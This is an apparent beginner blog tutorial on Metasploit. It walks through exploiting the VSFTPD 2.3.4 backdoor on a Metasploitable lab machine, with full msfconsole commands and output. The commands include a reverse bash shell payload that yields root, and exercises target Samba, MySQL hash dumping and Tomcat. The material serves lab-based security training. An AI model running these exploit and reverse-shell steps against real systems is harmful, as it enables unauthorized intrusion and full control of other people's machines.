Ethical Hacking #Metasploit#exploitation#beginners

Introduction to Metasploit Framework: Your First Exploit

Learn Metasploit basics: msfconsole, setting payloads, exploits, listeners, and running your first successful attack.

11 min read

Metasploit Framework is the industry-standard exploitation toolkit used by penetration testers worldwide. Rather than manually crafting exploits, Metasploit provides pre-built modules that automate attacks. For someone learning security, Metasploit is the bridge between theoretical knowledge and practical execution.

This guide walks you through launching your first exploit using Metasploit’s core component: msfconsole.

What Is Metasploit Framework?

Metasploit is a modular framework containing:

  • Exploits: Code that takes advantage of specific vulnerabilities
  • Payloads: Code executed after exploitation (reverse shells, Meterpreter)
  • Listeners: Components that catch incoming connections
  • Encoders: Tools to evade antivirus detection
  • Auxiliary modules: Network scanning, enumeration, discovery tools

The framework is free (Metasploit Community) and open-source. Professional pentests often use Metasploit Pro, but Community Edition covers 90% of learning needs.

Installation

On Kali Linux (pre-installed):

Metasploit comes with Kali but may need updating:

sudo apt update
sudo apt install metasploit-framework

Verify installation:

msfconsole --version
# Output: MetasploitFramework Community Edition 6.4.x

On other Linux systems:

Download and install from https://www.metasploit.com/download/

macOS:

brew install metasploit

Starting msfconsole

Launch the interactive Metasploit console:

msfconsole

First launch creates databases (this takes 30-60 seconds).

You’ll see:

  o=[]-----[]~|   "I tried to do my best"
  \_/|_|\_|   \     - The Mighty Metasploit
  "|"-_|_|-._|  |v6.4.0-dev
  _|_V|_V|_|-._  /
  Metasploit tip: Use 'help' to see all available commands

msf6 >

The msf6 > prompt is where you interact with the framework.

Core msfconsole Commands

CommandPurpose
searchFind exploits, payloads, auxiliary modules
useSelect an exploit or module
show optionsDisplay configurable parameters
setConfigure a parameter
run / exploitExecute the module
backReturn to main prompt
historyView command history
helpDisplay help documentation

Your First Exploit: VSFTPD Backdoor

VSFTPD 2.3.4 contains a deliberate backdoor. Metasploitable runs this exact version, making it perfect for learning.

Step 1: Search for the exploit

msf6 > search vsftpd

Output:

Matching Modules
================

#  Name                                  Disclosure Date  Rank  Check  Description
-  ----                                  ---------------  ----  -----  -----------
0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       Good  No     VSFTPD v2.3.4 Backdoor Command Execution

Step 2: Load the exploit

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

You’re now in the exploit module context:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Step 3: Display required options

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Output:

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                    yes       The target host(s)
   RPORT   21               no        The target port (default: 21)

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  ---

RHOSTS is required — it’s the Remote HOST (target).

Step 4: Set the target host

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5

(Replace 10.0.2.5 with your Metasploitable machine’s actual IP)

Step 5: Check payloads

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Output:

Compatible Payloads
====================

#   Name                    Disclosure Date  Rank  Description
-   ----                    ---------------  ----  -----------
0   cmd/unix/interact       -                -     Unix Command Shell
1   cmd/unix/reverse_bash   -                -     Unix Command Shell, Reverse TCP
2   cmd/unix/reverse_netcat -                -     Unix Command Shell, Reverse TCP

The default cmd/unix/interact is fine for learning.

Step 6: Run the exploit

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

Or:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

Expected output:

[*] 10.0.2.5:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.2.5:21 - USER response: 330 Please specify the password.
[!] 10.0.2.5:21 - The server is vulnerable!
[*] Exploit completed, but no session was created.

The backdoor was triggered. Your payload (shell) should be available. In this case, we sent an “interact” payload, which may not create a visible session.

Understanding the Exploit Workflow

What just happened:

  1. Reconnaissance: Metasploit connected to FTP on port 21
  2. Fingerprinting: Identified VSFTPD version 2.3.4
  3. Exploitation: Sent the backdoor trigger (USER with smiley face)
  4. Payload execution: Executed the “interact” payload

In production pentests, you’d use a reverse shell:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

This shows new required options:

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.100    yes       The listen address (this machine)
   LPORT  4444             yes       The listen port

LHOST = Listener HOST (your Kali machine) LPORT = Listener PORT (where you’ll receive the connection)

Using a Reverse Shell Payload

A reverse shell connects back to you, giving interactive command execution.

Step 1: Set the reverse payload

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash

Step 2: Set listener options

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set LHOST 10.0.2.4
LHOST => 10.0.2.4

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set LPORT 4444
LPORT => 4444

Step 3: Run the exploit

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

Expected output:

[*] Started reverse TCP listener on 10.0.2.4:4444
[*] 10.0.2.5:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.2.5:21 - USER response: 330 Please specify the password.
[!] 10.0.2.5:21 - The server is vulnerable!
[*] Sending reverse bash shell...
[*] Command shell session 1 opened (10.0.2.4:4444 -> 10.0.2.5:65296)

You’re now connected to Metasploitable!

id
# uid=0(root) gid=0(root) groups=0(root)

whoami
# root

pwd
# /

ls -la /
# Lists the root directory of Metasploitable

You’ve successfully exploited a vulnerability and gained shell access.

Key Metasploit Concepts

Exploit vs. Payload

  • Exploit: The attack code (VSFTPD backdoor trigger)
  • Payload: What happens after exploitation (reverse bash shell)

An exploit without a payload is reconnaissance only.

Handler

When using reverse shells, Metasploit automatically handles incoming connections.

[*] Started reverse TCP listener on 10.0.2.4:4444

This is the handler — it listens for the target to connect back.

Sessions

Once you have a shell, it’s a “session”:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions
Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1   -     shell cmd unix  -            10.0.2.4:4444 -> 10.0.2.5:65296 (10.0.2.5)

Interact with a session:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions -i 1
[*] Starting interaction with 1...

root@metasploitable:/#

Common Metasploit Workflows

Port Scanning with Metasploit

Before exploiting, use auxiliary modules for scanning:

msf6 > use auxiliary/scanner/nmap/nmap
msf6 auxiliary(scanner/nmap/nmap) > set RHOSTS 10.0.2.5
msf6 auxiliary(scanner/nmap/nmap) > run

Vulnerability Scanning

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.0.2.5
msf6 auxiliary(scanner/smb/smb_version) > run

Running Multiple Exploits

Store targets in a file:

echo "10.0.2.5" > targets.txt
echo "10.0.2.6" >> targets.txt

In msfconsole:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS file:/home/user/targets.txt
RHOSTS => file:/home/user/targets.txt

Practical Exercises

  1. Exploit Samba on Metasploitable:

    • Search for “samba”
    • Use exploit/linux/samba/trans2open
    • Set RHOSTS to Metasploitable
    • Gain shell access

  2. Exploit MySQL:

    • Search for “mysql_login”
    • Identify default credentials (root/empty)
    • Enumerate databases
    • Dump user hashes

  3. Web application exploits:

    • Search for “tomcat”
    • Exploit JSP upload vulnerability
    • Gain RCE on Metasploitable’s Tomcat instance

Important Warnings

  • Only use on authorized systems — Metasploitable in your lab, never production
  • Keep detailed logs — Document what you exploit and how
  • Understand the exploit — Don’t just run modules blindly
  • Check for public data — Exploitation creates noise; understand IDS/IPS risks

Next Steps

Master Metasploit by:

  1. Exploiting every vulnerable service on Metasploitable
  2. Experimenting with different payloads (Meterpreter, ASP, PHP, etc.)
  3. Learning post-exploitation modules
  4. Practicing on legal platforms like HackTheBox and TryHackMe
  5. Reading Metasploit Framework exploit code to understand how they work

Metasploit is your bridge from learning to doing. Master it, and exploitation becomes systematic and repeatable.

#penetration testing #Kali Linux #msfconsole #beginners #exploitation #Metasploit

// related articles

ethical-hacking Getting Started with Kali Linux in 2026: Complete Install Guide 9 min read ethical-hacking Burp Suite Community Edition Tutorial: Intercepting Web Traffic 10 min read ethical-hacking Password Cracking with Hashcat and John: Beginner's Guide 11 min read